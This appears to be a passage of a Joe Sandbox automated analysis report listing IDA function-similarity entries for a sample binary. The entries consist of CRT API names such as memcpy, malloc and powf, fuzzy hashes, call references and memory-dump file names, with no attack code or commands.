                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: mallocmemcpy$free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 798594229-0
                                                                                                                                                                          • Opcode ID: 0fae82c393424ee353d7ee3fbf6beceb1d1835196ecabe1d95df275554cd0b6a
                                                                                                                                                                          • Instruction ID: 197282f93677c8541e75ab55b154b8381e9c81d2bb6789d97fa67a6ae128fe53
                                                                                                                                                                          • Opcode Fuzzy Hash: 0fae82c393424ee353d7ee3fbf6beceb1d1835196ecabe1d95df275554cd0b6a
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C416137619BC2C6EB50DF25A4881B8A3A0FB84B94F185636DE5DC7799DF38E481CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: powf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3445610689-0
                                                                                                                                                                          • Opcode ID: 7fcae04e762ba6a171d7b05269782bddc50ef9e2a3e56b70d57abb80ea3f3081
                                                                                                                                                                          • Instruction ID: 3cc894760eeb89ca4d467e75c5143a013b76ec64dbf8eed6874bf2b4bfddd10e
                                                                                                                                                                          • Opcode Fuzzy Hash: 7fcae04e762ba6a171d7b05269782bddc50ef9e2a3e56b70d57abb80ea3f3081
                                                                                                                                                                          • Instruction Fuzzy Hash: 83E10C33E2878DC5E213A73B50851B97390AF6E784F1DC732ED48B6561EF2AB591C501
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: powf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3445610689-0
                                                                                                                                                                          • Opcode ID: 027569809ea2021a4c13de546010c86480e5b8bf7dba3485d0678649a7006ec2
                                                                                                                                                                          • Instruction ID: eb67fe80c7e6c4ce6deba1d1d2dd6186b1db95d6d0418c368d24a1ce98a32455
                                                                                                                                                                          • Opcode Fuzzy Hash: 027569809ea2021a4c13de546010c86480e5b8bf7dba3485d0678649a7006ec2
                                                                                                                                                                          • Instruction Fuzzy Hash: A3E1B833D2DACDC5E253A63750861F9A390AF6E384F1DDB32ED98B51B1EF29B1818501
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: powf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3445610689-0
                                                                                                                                                                          • Opcode ID: 3808054c5ae7bf1a53d280862de973172eeb55c374488943f47bc97568e5a8f5
                                                                                                                                                                          • Instruction ID: 6e1bcab7cdeb3d0aae73e9ec5a815db9e7e62a9987e7561a52261d11298e2cae
                                                                                                                                                                          • Opcode Fuzzy Hash: 3808054c5ae7bf1a53d280862de973172eeb55c374488943f47bc97568e5a8f5
                                                                                                                                                                          • Instruction Fuzzy Hash: B7E1F723D2CBC9C5E223A63694862F9B750AF6F3C5F199732ED48B51B2EF2975818500
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: 49b055fe289a3ccfddb74a1e8ee29bea9c1f4534a633c4789ff51beea63a1f94
                                                                                                                                                                          • Instruction ID: ec35677c7010c7554247dba36d942a5662f5853f40c863ba1182bd5af85febb4
                                                                                                                                                                          • Opcode Fuzzy Hash: 49b055fe289a3ccfddb74a1e8ee29bea9c1f4534a633c4789ff51beea63a1f94
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B113722A6ABC2C6FE99AF95D89833423A0FF45F85F089535CD0DD7361DF2DA5018A50
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memchr
                                                                                                                                                                          • String ID: %*s%.*s$ %.*s$--------------------------------
                                                                                                                                                                          • API String ID: 3297308162-2326682469
                                                                                                                                                                          • Opcode ID: b5728508ad553b0ff35536d9bdaed1d14f66f065b559a275ef1468c709f965f7
                                                                                                                                                                          • Instruction ID: 119d0ccc95a0653c0b787fb446a6cd23fdd142bbccac29ea1ce250127658dcf9
                                                                                                                                                                          • Opcode Fuzzy Hash: b5728508ad553b0ff35536d9bdaed1d14f66f065b559a275ef1468c709f965f7
                                                                                                                                                                          • Instruction Fuzzy Hash: 25E19A33A14A86C5E751DB35D0897F873A0EF69788F059336DE58A6295EF38A085C700
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2138705365-0
                                                                                                                                                                          • Opcode ID: 39b9ac87aa205d46c67810882ff08debaae79012e678ac85721c9577327cf593
                                                                                                                                                                          • Instruction ID: 3661b2587e7760a889d414782ff934d88eeff0b3e4181bf045d0fc546ff4b15c
                                                                                                                                                                          • Opcode Fuzzy Hash: 39b9ac87aa205d46c67810882ff08debaae79012e678ac85721c9577327cf593
                                                                                                                                                                          • Instruction Fuzzy Hash: CA816CB3A28A85D1EB05EF29E58837D2365EB44F88F548032DA4D47669EF79E8D4C340
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ceilffloorf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 300201839-0
                                                                                                                                                                          • Opcode ID: 310c4a4718882cd62701a14ea5a54184f80dd71cdfa5ec1aff0a3c4ec849eab5
                                                                                                                                                                          • Instruction ID: 7a147ce1f9cc97bdbca568db627f255b0bcf80dd4966c5e3dd01d8f45ba8843a
                                                                                                                                                                          • Opcode Fuzzy Hash: 310c4a4718882cd62701a14ea5a54184f80dd71cdfa5ec1aff0a3c4ec849eab5
                                                                                                                                                                          • Instruction Fuzzy Hash: D151EC33A2CBD185D3629F3191853F9B7A4BF69381F158332EA88A6655EF3DD491CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF674177141), ref: 00007FF67418B4B3
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF674177141), ref: 00007FF67418B506
                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF674177141), ref: 00007FF67418B510
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B55C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1775671525-0
                                                                                                                                                                          • Opcode ID: 41f41ca1953d7b413ce93713c78c4b82f14de955f7ee8bc639e98f23a1c68ac0
                                                                                                                                                                          • Instruction ID: e085b627a8d18df14e45d334d81ef0224398aa806c5aac9243647354248bb683
                                                                                                                                                                          • Opcode Fuzzy Hash: 41f41ca1953d7b413ce93713c78c4b82f14de955f7ee8bc639e98f23a1c68ac0
                                                                                                                                                                          • Instruction Fuzzy Hash: C741C062B25A41D1E914EB15E18817D6299BB44BF4F940731EA7D87BD9EE3CE046C304
                                                                                                                                                                          APIs
                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418BE41
                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418BE54
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418BEC7
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418BED4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1775671525-0
                                                                                                                                                                          • Opcode ID: cb7334bf99b79f2ae6454404cc3ca89f3216df2a7df3ece308a9828e93bf97ba
                                                                                                                                                                          • Instruction ID: e8c2554cd63ab3af4c3422663a32ea89940cfee5489187f78abc8482e9c0dca7
                                                                                                                                                                          • Opcode Fuzzy Hash: cb7334bf99b79f2ae6454404cc3ca89f3216df2a7df3ece308a9828e93bf97ba
                                                                                                                                                                          • Instruction Fuzzy Hash: 0441C023724A86C5EA14EB25D4882B96364FB08BF0F548635EB6D8BBD5DF3CE495C300
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1155477157-0
                                                                                                                                                                          • Opcode ID: 26c1260be44d7b5467445e5c0687545ac28577c52627bae4ab9c3b1bdae4856e
                                                                                                                                                                          • Instruction ID: 46d135a613c8112beb34879e0d5e3dbfac8e13cf054504aaf0f96e7a872ce4a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 26c1260be44d7b5467445e5c0687545ac28577c52627bae4ab9c3b1bdae4856e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B31F563B29786C8FA19BB15D5883B956499B05FF4F544231DA2D87BC6DE3CF481C340
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1775671525-0
                                                                                                                                                                          • Opcode ID: 87cea115af44fe7f2d0e87bdb63a59dc65435fcd6c190dce4b22b5a2c9516a04
                                                                                                                                                                          • Instruction ID: 8e7786e773eaf069b23099338f8af6478c84c33a765c8943a88e505cd35c1676
                                                                                                                                                                          • Opcode Fuzzy Hash: 87cea115af44fe7f2d0e87bdb63a59dc65435fcd6c190dce4b22b5a2c9516a04
                                                                                                                                                                          • Instruction Fuzzy Hash: 8431B563B29785C5EE14EF12A5883B8A759AB04BF4F244631EE5D8BBD6DE7CE041C300
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3510742995-0
                                                                                                                                                                          • Opcode ID: 53b7d8dca0d1efab2b49221ca2de80cad4f06bd7fbd39ff0065455d8cf757108
                                                                                                                                                                          • Instruction ID: dbcfb5ccce380bb51f1916cdd4cb98deaec7ad2440dd6b627d6a9c526f2b9eab
                                                                                                                                                                          • Opcode Fuzzy Hash: 53b7d8dca0d1efab2b49221ca2de80cad4f06bd7fbd39ff0065455d8cf757108
                                                                                                                                                                          • Instruction Fuzzy Hash: A031E723B19786C9FA15AB65A58837861589F14BF4F240731EE2C477D6DE7CA4C38300
                                                                                                                                                                          APIs
                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000,00000004,?,00007FF674177141), ref: 00007FF67418B33C
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000004,?,00007FF674177141), ref: 00007FF67418B370
                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000,00000004,?,00007FF674177141), ref: 00007FF67418B37A
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B3A3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1775671525-0
                                                                                                                                                                          • Opcode ID: cea8de1e166ba4e38c7eb499506cd0031c948df10273b4ce92276d505d523b81
                                                                                                                                                                          • Instruction ID: 587329e93b5d79ec4dc9455f32c8e12991ea079e94ce25964f5f850138ad1c50
                                                                                                                                                                          • Opcode Fuzzy Hash: cea8de1e166ba4e38c7eb499506cd0031c948df10273b4ce92276d505d523b81
                                                                                                                                                                          • Instruction Fuzzy Hash: C4318173B28785C5EE20EB1691882BDA359AB04BF4F544631EE6D877D5DE3CE041C200
                                                                                                                                                                          APIs
                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,00007FF674172701), ref: 00007FF6741896DA
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF674172701), ref: 00007FF674189760
                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,00007FF674172701), ref: 00007FF674189786
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6741897AA
                                                                                                                                                                            • Part of subcall function 00007FF67418CF54: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF67418B925,?,?,?,?,?,00007FF674189E95), ref: 00007FF67418CF6E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1155477157-0
                                                                                                                                                                          • Opcode ID: d6b22d18f2aa62c32d368336290e2156c157205afbd35b8e764757cadaeeb0de
                                                                                                                                                                          • Instruction ID: 421f49a69ef8da8bd640ed6c76bf744c23a8c654c7a633834e7be227a8136d3e
                                                                                                                                                                          • Opcode Fuzzy Hash: d6b22d18f2aa62c32d368336290e2156c157205afbd35b8e764757cadaeeb0de
                                                                                                                                                                          • Instruction Fuzzy Hash: CE31A323A29745C1EA14AF1295882787299EB46BB4F244B30DA7E877D1DF3DF4928340
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
